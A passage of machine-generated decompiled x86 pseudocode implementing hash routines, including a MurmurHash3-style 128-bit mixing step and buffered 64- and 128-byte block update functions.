                                                      										 *(__ecx + 0x20) = 0;
                                                      										__edx = __eax * 0x87c37b91;
                                                      										__edi =  *(__ecx + 0x14) * 0x114253d5 + __eax * 0x87c37b91;
                                                      										__edx = __eax * 0x114253d5 >> 0x20;
                                                      										__eax = __eax * 0x114253d5;
                                                      										__esi =  *(__ecx + 0x1c) * 0x2745937f;
                                                      										__edx = __edi + __edx;
                                                      										__eax = (__eax << 0x00000020 | __edx) << 0x1f;
                                                      										__ebp = __edx;
                                                      										__esp[6] = (__eax << 0x00000020 | __edx) << 0x1f;
                                                      										__ebp = (__edx << 0x00000020 | __eax) << 0x1f;
                                                      										__eax =  *(__ecx + 0x18);
                                                      										__esp[7] = __ebp;
                                                      										__edx = __eax * 0x4cf5ad43;
                                                      										__esi =  *(__ecx + 0x1c) * 0x2745937f + __eax * 0x4cf5ad43;
                                                      										__edx = 0x2745937f;
                                                      										__edx = __eax * 0x2745937f >> 0x20;
                                                      										__eax = __eax * 0x2745937f;
                                                      										__edx = __esi + __edx;
                                                      										__eax = (0x2745937f << 0x00000020 | __eax) >> 0x1f;
                                                      										__edi = __edx;
                                                      										__esp[2] = (0x2745937f << 0x00000020 | __eax) >> 0x1f;
                                                      										__edi = (__eax << 0x00000020 | __edx) >> 0x1f;
                                                      										__esi = __esp[6];
                                                      										__esp[3] = (__eax << 0x00000020 | __edx) >> 0x1f;
                                                      										__edi = __esp[7];
                                                      										__eax = __esi * 0x4cf5ad43;
                                                      										__edx = __esp[7] * 0x2745937f;
                                                      										__edi = __esp[1];
                                                      										__ebp = __esp[7] * 0x2745937f + __esi * 0x4cf5ad43;
                                                      										__eax = 0x2745937f;
                                                      										__edx = 0x2745937f * __esi >> 0x20;
                                                      										__eax = 0x2745937f * __esi;
                                                      										__esi =  *__esp;
                                                      										__edx = __edx + __ebp;
                                                      										__eax = __eax ^  *__esp;
                                                      										__edx = __edx ^ __esp[1];
                                                      										__esi = __eax;
                                                      										__edi = __esp[2];
                                                      										__eax = (__eax << 0x00000020 | __edx) << 0x1b;
                                                      										__ebp = 5;
                                                      										__edx = (__edx << 0x00000020 | __esi) << 0x1b;
                                                      										__eax = __eax + __esp[4];
                                                      										asm("adc edx, [esp+0x14]");
                                                      										__esi = __edx + __edx * 4;
                                                      										__edx = __eax * 5 >> 0x20;
                                                      										__eax = __eax * 5;
                                                      										__ebp = __esp[3];
                                                      										__edx = __esi + __edx;
                                                      										 *__esp = __eax;
                                                      										asm("adc edx, 0x0");
                                                      										__esp[1] = __edx;
                                                      										__eax = __edi * 0x87c37b91;
                                                      										__edx = __esp[3] * 0x114253d5;
                                                      										__ebp = __esp[4];
                                                      										__esi = __esp[3] * 0x114253d5 + __edi * 0x87c37b91;
                                                      										__eax = __edi;
                                                      										__edi = 0x114253d5;
                                                      										__edx = __eax * 0x114253d5 >> 0x20;
                                                      										__eax = __eax * 0x114253d5;
                                                      										__edi = 5;
                                                      										__edx = __esi + __edx;
                                                      										__esi = __esp[5];
                                                      										__eax = __eax ^ __esp[4];
                                                      										__ebp = __eax;
                                                      										__edx = __edx ^ __esp[5];
                                                      										__eax = (__eax << 0x00000020 | __edx) << 0x1f;
                                                      										__edx = (__edx << 0x00000020 | __ebp) << 0x1f;
                                                      										__eax = __eax +  *__esp;
                                                      										asm("adc edx, [esp+0x4]");
                                                      										__ebp = __edx + __edx * 4;
                                                      										__edx = __eax * 5 >> 0x20;
                                                      										__eax = __eax * 5;
                                                      										__edx = __edx + __ebp;
                                                      										__esp[4] = __eax;
                                                      										asm("adc edx, 0x0");
                                                      										__esp[5] = __edx;
                                                      										goto L171;
                                                      									} else {
                                                      										__edi = __eax + 1;
                                                      										__ebp = __esp[0x12];
                                                      										 *(__ecx + 0x20) = __edi;
                                                      										__edx =  *__ebx & 0x000000ff;
                                                      										__ebp = __esp[0x12] - 1;
                                                      										 *(__ecx + __eax + 0x10) = __dl;
                                                      										if(__ebp == 0) {
                                                      											goto L176;
                                                      										} else {
                                                      											if(__edi == 0x10) {
                                                      												__esp[0x12] = __ebp;
                                                      												__ebx = __ebx + 1;
                                                      												goto L170;
                                                      											} else {
                                                      												__ebp = __eax + 2;
                                                      												 *(__ecx + 0x20) = __ebp;
                                                      												__edx =  *(__ebx + 1) & 0x000000ff;
                                                      												 *(__ecx + __edi + 0x10) = __dl;
                                                      												__edx = __esp[0x12];
                                                      												__edx = __esp[0x12] - 2;
                                                      												if(__edx == 0) {
                                                      													goto L176;
                                                      												} else {
                                                      													if(__ebp == 0x10) {
                                                      														__esp[0x12] = __edx;
                                                      														__ebx = __ebx + 2;
                                                      														goto L170;
                                                      													} else {
                                                      														__edi = __eax + 3;
                                                      														 *(__ecx + 0x20) = __edi;
                                                      														__edx =  *(__ebx + 2) & 0x000000ff;
                                                      														 *(__ecx + 0x10 + __ebp) = __dl;
                                                      														__ebp = __esp[0x12];
                                                      														__ebp = __esp[0x12] - 3;
                                                      														if(__ebp == 0) {
                                                      															goto L176;
                                                      														} else {
                                                      															if(__edi == 0x10) {
                                                      																__esp[0x12] = __ebp;
                                                      																__ebx = __ebx + 3;
                                                      																goto L170;
                                                      															} else {
                                                      																__ebp = __eax + 4;
                                                      																 *(__ecx + 0x20) = __ebp;
                                                      																__edx =  *(__ebx + 3) & 0x000000ff;
                                                      																 *(__ecx + __edi + 0x10) = __dl;
                                                      																__edx = __esp[0x12];
                                                      																__edx = __esp[0x12] - 4;
                                                      																if(__edx == 0) {
                                                      																	goto L176;
                                                      																} else {
                                                      																	if(__ebp == 0x10) {
                                                      																		__esp[0x12] = __edx;
                                                      																		__ebx = __ebx + 4;
                                                      																		goto L170;
                                                      																	} else {
                                                      																		__edi = __eax + 5;
                                                      																		 *(__ecx + 0x20) = __edi;
                                                      																		__edx =  *(__ebx + 4) & 0x000000ff;
                                                      																		 *(__ecx + 0x10 + __ebp) = __dl;
                                                      																		__ebp = __esp[0x12];
                                                      																		__ebp = __esp[0x12] - 5;
                                                      																		if(__ebp == 0) {
                                                      																			goto L176;
                                                      																		} else {
                                                      																			if(__edi == 0x10) {
                                                      																				__esp[0x12] = __ebp;
                                                      																				__ebx = 5 + __ebx;
                                                      																				goto L170;
                                                      																			} else {
                                                      																				__ebp = __eax + 6;
                                                      																				 *(__ecx + 0x20) = __ebp;
                                                      																				__edx =  *(5 + __ebx) & 0x000000ff;
                                                      																				 *(__ecx + __edi + 0x10) = __dl;
                                                      																				__edx = __esp[0x12];
                                                      																				__edx = __esp[0x12] - 6;
                                                      																				if(__edx == 0) {
                                                      																					goto L176;
                                                      																				} else {
                                                      																					if(__ebp == 0x10) {
                                                      																						__esp[0x12] = __edx;
                                                      																						__ebx = __ebx + 6;
                                                      																						goto L170;
                                                      																					} else {
                                                      																						__edi = __eax + 7;
                                                      																						 *(__ecx + 0x20) = __edi;
                                                      																						__edx =  *(__ebx + 6) & 0x000000ff;
                                                      																						 *(__ecx + 0x10 + __ebp) = __dl;
                                                      																						__ebp = __esp[0x12];
                                                      																						__ebp = __esp[0x12] - 7;
                                                      																						if(__ebp == 0) {
                                                      																							goto L176;
                                                      																						} else {
                                                      																							if(__edi == 0x10) {
                                                      																								__esp[0x12] = __ebp;
                                                      																								__ebx = __ebx + 7;
                                                      																								goto L170;
                                                      																							} else {
                                                      																								__ebp = __eax + 8;
                                                      																								 *(__ecx + 0x20) = __ebp;
                                                      																								__edx =  *(__ebx + 7) & 0x000000ff;
                                                      																								 *(__ecx + __edi + 0x10) = __dl;
                                                      																								__edx = __esp[0x12];
                                                      																								__edx = __esp[0x12] - 8;
                                                      																								if(__edx == 0) {
                                                      																									goto L176;
                                                      																								} else {
                                                      																									if(__ebp == 0x10) {
                                                      																										__esp[0x12] = __edx;
                                                      																										__ebx = 8 + __ebx;
                                                      																										goto L170;
                                                      																									} else {
                                                      																										__edi = __eax + 9;
                                                      																										 *(__ecx + 0x20) = __edi;
                                                      																										__edx =  *(8 + __ebx) & 0x000000ff;
                                                      																										 *(__ecx + 0x10 + __ebp) = __dl;
                                                      																										__ebp = __esp[0x12];
                                                      																										__ebp = __esp[0x12] - 9;
                                                      																										if(__ebp == 0) {
                                                      																											goto L176;
                                                      																										} else {
                                                      																											if(__edi == 0x10) {
                                                      																												__esp[0x12] = __ebp;
                                                      																												__ebx = __ebx + 9;
                                                      																												goto L170;
                                                      																											} else {
                                                      																												__ebp = __eax + 0xa;
                                                      																												 *(__ecx + 0x20) = __ebp;
                                                      																												__edx =  *(__ebx + 9) & 0x000000ff;
                                                      																												 *(__ecx + __edi + 0x10) = __dl;
                                                      																												__edx = __esp[0x12];
                                                      																												__edx = __esp[0x12] - 0xa;
                                                      																												if(__edx == 0) {
                                                      																													goto L176;
                                                      																												} else {
                                                      																													if(__ebp == 0x10) {
                                                      																														__esp[0x12] = __edx;
                                                      																														__ebx = __ebx + 0xa;
                                                      																														goto L170;
                                                      																													} else {
                                                      																														__edi = __eax + 0xb;
                                                      																														 *(__ecx + 0x20) = __edi;
                                                      																														__edx =  *(__ebx + 0xa) & 0x000000ff;
                                                      																														 *(__ecx + 0x10 + __ebp) = __dl;
                                                      																														__ebp = __esp[0x12];
                                                      																														__ebp = __esp[0x12] - 0xb;
                                                      																														if(__ebp == 0) {
                                                      																															goto L176;
                                                      																														} else {
                                                      																															if(__edi == 0x10) {
                                                      																																__esp[0x12] = __ebp;
                                                      																																__ebx = __ebx + 0xb;
                                                      																																goto L170;
                                                      																															} else {
                                                      																																__ebp = __eax + 0xc;
                                                      																																 *(__ecx + 0x20) = __ebp;
                                                      																																__edx =  *(__ebx + 0xb) & 0x000000ff;
                                                      																																 *(__ecx + __edi + 0x10) = __dl;
                                                      																																__edx = __esp[0x12];
                                                      																																__edx = __esp[0x12] - 0xc;
                                                      																																if(__edx == 0) {
                                                      																																	goto L176;
                                                      																																} else {
                                                      																																	if(__ebp == 0x10) {
                                                      																																		__esp[0x12] = __edx;
                                                      																																		__ebx = __ebx + 0xc;
                                                      																																		goto L170;
                                                      																																	} else {
                                                      																																		__edi = __eax + 0xd;
                                                      																																		 *(__ecx + 0x20) = __edi;
                                                      																																		__edx =  *(__ebx + 0xc) & 0x000000ff;
                                                      																																		 *(__ecx + 0x10 + __ebp) = __dl;
                                                      																																		__ebp = __esp[0x12];
                                                      																																		__ebp = __esp[0x12] - 0xd;
                                                      																																		if(__ebp == 0) {
                                                      																																			goto L176;
                                                      																																		} else {
                                                      																																			if(__edi == 0x10) {
                                                      																																				__esp[0x12] = __ebp;
                                                      																																				__ebx = __ebx + 0xd;
                                                      																																				goto L170;
                                                      																																			} else {
                                                      																																				__eax = __eax + 0xe;
                                                      																																				 *(__ecx + 0x20) = __eax;
                                                      																																				__edx =  *(__ebx + 0xd) & 0x000000ff;
                                                      																																				 *(__ecx + __edi + 0x10) = __dl;
                                                      																																				__edx = __esp[0x12];
                                                      																																				__edx = __esp[0x12] - 0xe;
                                                      																																				if(__edx == 0) {
                                                      																																					goto L176;
                                                      																																				} else {
                                                      																																					if(__eax != 0xf) {
                                                      																																						__esp[0x12] = __edx;
                                                      																																						__ebx = __ebx + 0xe;
                                                      																																						goto L170;
                                                      																																					} else {
                                                      																																						 *(__ecx + 0x20) = 0x10;
                                                      																																						__edx = __ebx + 0xf;
                                                      																																						__eax =  *(__ebx + 0xe) & 0x000000ff;
                                                      																																						_t390 =  &(__esp[0x12]);
                                                      																																						 *_t390 = __esp[0x12] - 0xf;
                                                      																																						 *(__ecx + 0x1f) = __al;
                                                      																																						if( *_t390 == 0) {
                                                      																																							goto L176;
                                                      																																						} else {
                                                      																																							__ebx = __edx;
                                                      																																							goto L170;
                                                      																																						}
                                                      																																					}
                                                      																																				}
                                                      																																			}
                                                      																																		}
                                                      																																	}
                                                      																																}
                                                      																															}
                                                      																														}
                                                      																													}
                                                      																												}
                                                      																											}
                                                      																										}
                                                      																									}
                                                      																								}
                                                      																							}
                                                      																						}
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																		}
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L440;
                                                      						case 0x11:
                                                      							__esp[0xa] = __ecx;
                                                      							__esp[9] = __edx;
                                                      							__eax =  *__ebx;
                                                      							__ebx = __esp[6];
                                                      							__esp[8] = __eax;
                                                      							__esp =  &(__esp[7]);
                                                      							_push(__ebp);
                                                      							__edx = 0;
                                                      							_push(__edi);
                                                      							_push(__esi);
                                                      							_push(__ebx);
                                                      							__esp = __esp - 0x2c;
                                                      							__esi = __esp[0x10];
                                                      							__ebx = __esp[0x12];
                                                      							__edi =  *(__esi + 8);
                                                      							__eax = __ebx;
                                                      							__edi =  *(__esi + 8) & 0x0000003f;
                                                      							__eax = __ebx +  *(__esi + 8);
                                                      							asm("adc edx, [esi+0xc]");
                                                      							 *(__esi + 8) = __ebx +  *(__esi + 8);
                                                      							__eax = 0x40;
                                                      							__eax = 0x40 - __edi;
                                                      							 *(__esi + 0xc) = 0;
                                                      							__edx = __edi + 0x10;
                                                      							if(__ebx >= 0x40) {
                                                      								__ecx = __esp[0x11];
                                                      								__ebp = __esi + __edx;
                                                      								__esp[5] = 0x40;
                                                      								if(0x40 >= 4) {
                                                      									if((__ebp & 0x00000001) != 0) {
                                                      										__ecx =  *__ecx & 0x000000ff;
                                                      										__edx = 0x3f;
                                                      										__ebp = __ebp + 1;
                                                      										 *(__ebp - 1) = __cl;
                                                      										__esp[5] = 0x3f;
                                                      										__ecx = __esp[0x11];
                                                      										__ecx = __esp[0x11] + 1;
                                                      									}
                                                      									if((__ebp & 0x00000002) != 0) {
                                                      										__edx =  *__ecx & 0x0000ffff;
                                                      										__ebp = __ebp + 2;
                                                      										__ecx = __ecx + 2;
                                                      										 *(__ebp - 2) = __dx;
                                                      										__esp[5] = __esp[5] - 2;
                                                      									}
                                                      									__edx = __esp[5];
                                                      									if(__edx >= 4) {
                                                      										__esp[7] = __eax;
                                                      										__esp[6] = __edx;
                                                      										__edx = 0;
                                                      										__esp[0x12] = __ebx;
                                                      										__eax = __esp[6];
                                                      										do {
                                                      											__ebx =  *(__ecx + __edx);
                                                      											 *(__ebp + __edx) =  *(__ecx + __edx);
                                                      											__edx = __edx + 4;
                                                      										} while (__edx < __eax);
                                                      										__eax = __esp[7];
                                                      										__ebp = __ebp + __edx;
                                                      										__ecx = __ecx + __edx;
                                                      										__ebx = __esp[0x12];
                                                      									}
                                                      								}
                                                      								__edx = 0;
                                                      								if((__esp[5] & 0x00000002) != 0) {
                                                      									__edx =  *__ecx & 0x0000ffff;
                                                      									 *__ebp = __dx;
                                                      									__edx = 2;
                                                      									if((__esp[5] & 0x00000001) != 0) {
                                                      										goto L241;
                                                      									}
                                                      								} else {
                                                      									if((__esp[5] & 0x00000001) != 0) {
                                                      										L241:
                                                      										__ecx =  *(__ecx + __edx) & 0x000000ff;
                                                      										 *(__ebp + __edx) = __cl;
                                                      									}
                                                      								}
                                                      								__esp[5] = __eax;
                                                      								__edx = __esi + 0x10;
                                                      								__esp[1] = __esi + 0x10;
                                                      								__ebp = __esi + 0x50;
                                                      								 *__esp = __ebp;
                                                      								__ebx = __edi + __ebx - 0x40;
                                                      								 *((intOrPtr*)(__esi + 0x78))() = __esp[5];
                                                      								__edx = __ebx;
                                                      								__esp[0x11] = __esp[0x11] + __esp[5];
                                                      								__edx = __ebx & 0xffffffc0;
                                                      								__ebx = __ebx & 0x0000003f;
                                                      								__eax = __esp[0x11];
                                                      								__eax = __esp[0x11] + __edx;
                                                      								if(__esp[0x11] >= __eax) {
                                                      									__edx = 0x10;
                                                      								} else {
                                                      									__esp[0x12] = __ebx;
                                                      									__edi = __esp[0x11];
                                                      									__esp[5] = __edx;
                                                      									__ebx = __esp[0x11];
                                                      									__edi = __eax;
                                                      									do {
                                                      										__esp[1] = __ebx;
                                                      										__ebx = 0x40 + __ebx;
                                                      										 *__esp = __ebp;
                                                      										__eax =  *((intOrPtr*)(__esi + 0x78))();
                                                      									} while (__ebx < __edi);
                                                      									__edx = __esp[5];
                                                      									__esp[0x11] = __esp[0x11] + __esp[5];
                                                      									__edx = 0x10;
                                                      									__ebx = __esp[0x12];
                                                      								}
                                                      							}
                                                      							__eax = __esp[0x11];
                                                      							__ecx = __esi + __edx;
                                                      							if(__ebx >= 4) {
                                                      								if((__cl & 0x00000001) != 0) {
                                                      									__edx =  *__eax & 0x000000ff;
                                                      									__ecx = __ecx + 1;
                                                      									__eax = __eax + 1;
                                                      									__ebx = __ebx - 1;
                                                      									 *(__ecx - 1) = __dl;
                                                      								}
                                                      								if((__cl & 0x00000002) != 0) {
                                                      									__edi =  *__eax & 0x0000ffff;
                                                      									__ecx = __ecx + 2;
                                                      									__eax = __eax + 2;
                                                      									__ebx = __ebx - 2;
                                                      									 *(__ecx - 2) = __di;
                                                      								}
                                                      								if(__ebx >= 4) {
                                                      									__edi = __ebx;
                                                      									__edx = 0;
                                                      									__edi = __ebx & 0xfffffffc;
                                                      									do {
                                                      										__esi =  *(__eax + __edx);
                                                      										 *(__ecx + __edx) =  *(__eax + __edx);
                                                      										__edx = __edx + 4;
                                                      									} while (__edx < __edi);
                                                      									__ecx = __ecx + __edx;
                                                      									__eax = __eax + __edx;
                                                      								}
                                                      							}
                                                      							__edx = 0;
                                                      							if((__bl & 0x00000002) != 0) {
                                                      								__esi =  *__eax & 0x0000ffff;
                                                      								__edx = 2;
                                                      								 *__ecx = __si;
                                                      								if((__bl & 0x00000001) == 0) {
                                                      									goto L224;
                                                      								} else {
                                                      									goto L225;
                                                      								}
                                                      							} else {
                                                      								if((__bl & 0x00000001) != 0) {
                                                      									L225:
                                                      									__eax =  *(__eax + __edx) & 0x000000ff;
                                                      									 *(__ecx + __edx) = __al;
                                                      									__esp =  &(__esp[0xb]);
                                                      									_pop(__ebx);
                                                      									_pop(__esi);
                                                      									_pop(__edi);
                                                      									_pop(__ebp);
                                                      									return __eax;
                                                      								} else {
                                                      									L224:
                                                      									__esp =  &(__esp[0xb]);
                                                      									_pop(__ebx);
                                                      									_pop(__esi);
                                                      									_pop(__edi);
                                                      									_pop(__ebp);
                                                      									return __eax;
                                                      								}
                                                      							}
                                                      							goto L440;
                                                      						case 0x12:
                                                      							__esp[0xa] = __ecx;
                                                      							__esp[9] = __edx;
                                                      							__eax =  *__ebx;
                                                      							__ebx = __esp[6];
                                                      							__esp[8] = __eax;
                                                      							__esp =  &(__esp[7]);
                                                      							_push(__ebp);
                                                      							__edx = 0;
                                                      							_push(__edi);
                                                      							_push(__esi);
                                                      							_push(__ebx);
                                                      							__esp = __esp - 0x2c;
                                                      							__esi = __esp[0x10];
                                                      							__ebx = __esp[0x12];
                                                      							__edi =  *(__esi + 8);
                                                      							__eax = __ebx;
                                                      							__edi =  *(__esi + 8) & 0x0000003f;
                                                      							__eax = __ebx +  *(__esi + 8);
                                                      							asm("adc edx, [esi+0xc]");
                                                      							 *(__esi + 8) = __ebx +  *(__esi + 8);
                                                      							__eax = 0x40;
                                                      							__eax = 0x40 - __edi;
                                                      							 *(__esi + 0xc) = 0;
                                                      							__edx = __edi + 0x10;
                                                      							if(__ebx >= 0x40) {
                                                      								__ecx = __esp[0x11];
                                                      								__ebp = __esi + __edx;
                                                      								__esp[5] = 0x40;
                                                      								if(0x40 >= 4) {
                                                      									if((__ebp & 0x00000001) != 0) {
                                                      										__ecx =  *__ecx & 0x000000ff;
                                                      										_t914 = __eax - 1; // 0x3f
                                                      										__edx = _t914;
                                                      										__ebp = __ebp + 1;
                                                      										 *(__ebp - 1) = __cl;
                                                      										__esp[5] = _t914;
                                                      										__ecx = __esp[0x11];
                                                      										__ecx = __esp[0x11] + 1;
                                                      									}
                                                      									if((__ebp & 0x00000002) != 0) {
                                                      										__edx =  *__ecx & 0x0000ffff;
                                                      										__ebp = __ebp + 2;
                                                      										__ecx = __ecx + 2;
                                                      										 *(__ebp - 2) = __dx;
                                                      										__esp[5] = __esp[5] - 2;
                                                      									}
                                                      									__edx = __esp[5];
                                                      									if(__edx >= 4) {
                                                      										__esp[7] = __eax;
                                                      										__esp[6] = __edx;
                                                      										__edx = 0;
                                                      										__esp[0x12] = __ebx;
                                                      										__eax = __esp[6];
                                                      										do {
                                                      											__ebx =  *(__ecx + __edx);
                                                      											 *(__ebp + __edx) =  *(__ecx + __edx);
                                                      											__edx = __edx + 4;
                                                      										} while (__edx < __eax);
                                                      										__eax = __esp[7];
                                                      										__ebp = __ebp + __edx;
                                                      										__ecx = __ecx + __edx;
                                                      										__ebx = __esp[0x12];
                                                      									}
                                                      								}
                                                      								__edx = 0;
                                                      								if((__esp[5] & 0x00000002) != 0) {
                                                      									__edx =  *__ecx & 0x0000ffff;
                                                      									 *__ebp = __dx;
                                                      									__edx = 2;
                                                      									if((__esp[5] & 0x00000001) != 0) {
                                                      										goto L294;
                                                      									}
                                                      								} else {
                                                      									if((__esp[5] & 0x00000001) != 0) {
                                                      										L294:
                                                      										__ecx =  *(__ecx + __edx) & 0x000000ff;
                                                      										 *(__ebp + __edx) = __cl;
                                                      									}
                                                      								}
                                                      								__esp[5] = __eax;
                                                      								__edx = __esi + 0x10;
                                                      								__esp[1] = __esi + 0x10;
                                                      								__ebp = __esi + 0x50;
                                                      								 *__esp = __ebp;
                                                      								__ebx = __edi + __ebx - 0x40;
                                                      								 *(__esi + 0x70)() = __esp[5];
                                                      								__edx = __ebx;
                                                      								__esp[0x11] = __esp[0x11] + __esp[5];
                                                      								__edx = __ebx & 0xffffffc0;
                                                      								__ebx = __ebx & 0x0000003f;
                                                      								__eax = __esp[0x11];
                                                      								__eax = __esp[0x11] + __edx;
                                                      								if(__esp[0x11] >= __eax) {
                                                      									__edx = 0x10;
                                                      								} else {
                                                      									__esp[0x12] = __ebx;
                                                      									__edi = __esp[0x11];
                                                      									__esp[5] = __edx;
                                                      									__ebx = __esp[0x11];
                                                      									__edi = __eax;
                                                      									do {
                                                      										__esp[1] = __ebx;
                                                      										__ebx = 0x40 + __ebx;
                                                      										 *__esp = __ebp;
                                                      										__eax =  *(__esi + 0x70)();
                                                      									} while (__ebx < __edi);
                                                      									__edx = __esp[5];
                                                      									__esp[0x11] = __esp[0x11] + __esp[5];
                                                      									__edx = 0x10;
                                                      									__ebx = __esp[0x12];
                                                      								}
                                                      							}
                                                      							__eax = __esp[0x11];
                                                      							__ecx = __esi + __edx;
                                                      							if(__ebx >= 4) {
                                                      								if((__cl & 0x00000001) != 0) {
                                                      									__edx =  *__eax & 0x000000ff;
                                                      									__ecx = __ecx + 1;
                                                      									__eax = __eax + 1;
                                                      									__ebx = __ebx - 1;
                                                      									 *(__ecx - 1) = __dl;
                                                      								}
                                                      								if((__cl & 0x00000002) != 0) {
                                                      									__edi =  *__eax & 0x0000ffff;
                                                      									__ecx = __ecx + 2;
                                                      									__eax = __eax + 2;
                                                      									__ebx = __ebx - 2;
                                                      									 *(__ecx - 2) = __di;
                                                      								}
                                                      								if(__ebx >= 4) {
                                                      									__edi = __ebx;
                                                      									__edx = 0;
                                                      									__edi = __ebx & 0xfffffffc;
                                                      									do {
                                                      										__esi =  *(__eax + __edx);
                                                      										 *(__ecx + __edx) =  *(__eax + __edx);
                                                      										__edx = __edx + 4;
                                                      									} while (__edx < __edi);
                                                      									__ecx = __ecx + __edx;
                                                      									__eax = __eax + __edx;
                                                      								}
                                                      							}
                                                      							__edx = 0;
                                                      							if((__bl & 0x00000002) != 0) {
                                                      								__esi =  *__eax & 0x0000ffff;
                                                      								__edx = 2;
                                                      								 *__ecx = __si;
                                                      								if((__bl & 0x00000001) == 0) {
                                                      									goto L277;
                                                      								} else {
                                                      									goto L278;
                                                      								}
                                                      							} else {
                                                      								if((__bl & 0x00000001) != 0) {
                                                      									L278:
                                                      									__eax =  *(__eax + __edx) & 0x000000ff;
                                                      									 *(__ecx + __edx) = __al;
                                                      									__esp =  &(__esp[0xb]);
                                                      									_pop(__ebx);
                                                      									_pop(__esi);
                                                      									_pop(__edi);
                                                      									_pop(__ebp);
                                                      									return __eax;
                                                      								} else {
                                                      									L277:
                                                      									__esp =  &(__esp[0xb]);
                                                      									_pop(__ebx);
                                                      									_pop(__esi);
                                                      									_pop(__edi);
                                                      									_pop(__ebp);
                                                      									return __eax;
                                                      								}
                                                      							}
                                                      							goto L440;
                                                      						case 0x13:
                                                      							__esp[0xa] = __ecx;
                                                      							__esp[9] = __edx;
                                                      							__eax =  *__ebx;
                                                      							__ebx = __esp[6];
                                                      							__esp[8] = __eax;
                                                      							__esp =  &(__esp[7]);
                                                      							_push(__ebp);
                                                      							__edx = 0;
                                                      							_push(__edi);
                                                      							_push(__esi);
                                                      							__esi = 0x80;
                                                      							_push(__ebx);
                                                      							__esp = __esp - 0x14;
                                                      							__edi = __esp[0xa];
                                                      							__ebx = __esp[0xc];
                                                      							__ecx =  *(__edi + 8);
                                                      							__eax = __ebx;
                                                      							__ecx =  *(__edi + 8) & 0x0000007f;
                                                      							__eax = __ebx +  *(__edi + 8);
                                                      							asm("adc edx, [edi+0xc]");
                                                      							__esi = 0x80 - __ecx;
                                                      							 *(__edi + 8) = __ebx +  *(__edi + 8);
                                                      							__eax = 0x10 + __ecx;
                                                      							 *(__edi + 0xc) = 0;
                                                      							if(__ebx >= 0x80) {
                                                      								__edx = __esp[0xb];
                                                      								__ebp = __edi + __eax;
                                                      								 *__esp = 0x80;
                                                      								if(0x80 >= 4) {
                                                      									if((__ebp & 0x00000001) != 0) {
                                                      										__eax =  *__edx & 0x000000ff;
                                                      										__ebp = __ebp + 1;
                                                      										 *(__ebp - 1) = __al;
                                                      										__eax = __esp[0xb];
                                                      										__edx = __esp[0xb] + 1;
                                                      										_t1027 = __esi - 1; // 0x7f
                                                      										__eax = _t1027;
                                                      										 *__esp = _t1027;
                                                      									}
                                                      									if((__ebp & 0x00000002) != 0) {
                                                      										__eax =  *__edx & 0x0000ffff;
                                                      										__ebp = __ebp + 2;
                                                      										__edx = __edx + 2;
                                                      										 *(__ebp - 2) = __ax;
                                                      										 *__esp =  *__esp - 2;
                                                      									}
                                                      									__eax =  *__esp;
                                                      									if(__eax >= 4) {
                                                      										__esp[2] = __esi;
                                                      										__esp[1] = __eax;
                                                      										__eax = 0;
                                                      										__esp[3] = __ecx;
                                                      										__esi = __esp[1];
                                                      										do {
                                                      											__ecx =  *(__eax + __edx);
                                                      											 *(__eax + __ebp) =  *(__eax + __edx);
                                                      											__eax = __eax + 4;
                                                      										} while (__eax < __esi);
                                                      										__esi = __esp[2];
                                                      										__ebp = __eax + __ebp;
                                                      										__edx = __eax + __edx;
                                                      										__ecx = __esp[3];
                                                      									}
                                                      								}
                                                      								__eax = 0;
                                                      								if(( *__esp & 0x00000002) != 0) {
                                                      									__eax =  *__edx & 0x0000ffff;
                                                      									 *__ebp = __ax;
                                                      									__eax = 2;
                                                      									if(( *__esp & 0x00000001) != 0) {
                                                      										goto L346;
                                                      									}
                                                      								} else {
                                                      									if(( *__esp & 0x00000001) != 0) {
                                                      										L346:
                                                      										__edx =  *(__eax + __edx) & 0x000000ff;
                                                      										 *(__eax + __ebp) = __dl;
                                                      									}
                                                      								}
                                                      								 *__esp = __ecx;
                                                      								__ebp = __edi + 0x90;
                                                      								__edx = __edi + 0x10;
                                                      								__ebp = L1003EA30(__ebp, __edi + 0x10);
                                                      								__ecx =  *__esp;
                                                      								__esp[0xb] = __esp[0xb] + __esi;
                                                      								__eax = __esp[0xb];
                                                      								__ebx =  *__esp + __ebx - 0x80;
                                                      								__edx = __ebx;
                                                      								__ebx = __ebx & 0x0000007f;
                                                      								__edx = __edx & 0xffffff80;
                                                      								__eax = __esp[0xb] + __edx;
                                                      								if(__esp[0xb] >= __eax) {
                                                      									__eax = 0x10;
                                                      								} else {
                                                      									__esp[0xc] = __ebx;
                                                      									__esi = __esp[0xb];
                                                      									 *__esp = __edx;
                                                      									__ebx = __esp[0xb];
                                                      									__esi = __eax;
                                                      									do {
                                                      										__edx = __ebx;
                                                      										__ebp = L1003EA30(__ebp, __ebx);
                                                      										__ebx = __ebx - 0xffffff80;
                                                      									} while (__ebx < __esi);
                                                      									__edx =  *__esp;
                                                      									__eax = 0x10;
                                                      									__ebx = __esp[0xc];
                                                      									__esp[0xb] = __esp[0xb] +  *__esp;
                                                      								}
                                                      							}
                                                      							__ecx = __edi + __eax;
                                                      							__eax = __esp[0xb];
                                                      							if(__ebx >= 4) {
                                                      								if((__cl & 0x00000001) != 0) {
                                                      									__edx =  *__eax & 0x000000ff;
                                                      									__ecx = __ecx + 1;
                                                      									__eax = __eax + 1;
                                                      									__ebx = __ebx - 1;
                                                      									 *(__ecx - 1) = __dl;
                                                      								}
                                                      								if((__cl & 0x00000002) != 0) {
                                                      									__esi =  *__eax & 0x0000ffff;
                                                      									__ecx = __ecx + 2;
                                                      									__eax = __eax + 2;
                                                      									__ebx = __ebx - 2;
                                                      									 *(__ecx - 2) = __si;
                                                      								}
                                                      								if(__ebx >= 4) {
                                                      									__edi = __ebx;
                                                      									__edx = 0;
                                                      									__edi = __ebx & 0xfffffffc;
                                                      									do {
                                                      										__esi =  *(__eax + __edx);
                                                      										 *(__ecx + __edx) =  *(__eax + __edx);
                                                      										__edx = __edx + 4;
                                                      									} while (__edx < __edi);
                                                      									__ecx = __ecx + __edx;
                                                      									__eax = __eax + __edx;
                                                      								}
                                                      							}
                                                      							__edx = 0;
                                                      							if((__bl & 0x00000002) != 0) {
                                                      								__edi =  *__eax & 0x0000ffff;
                                                      								__edx = 2;
                                                      								 *__ecx = __di;
                                                      								if((__bl & 0x00000001) == 0) {
                                                      									goto L329;
                                                      								} else {
                                                      									goto L330;
                                                      								}
                                                      							} else {
                                                      								if((__bl & 0x00000001) != 0) {
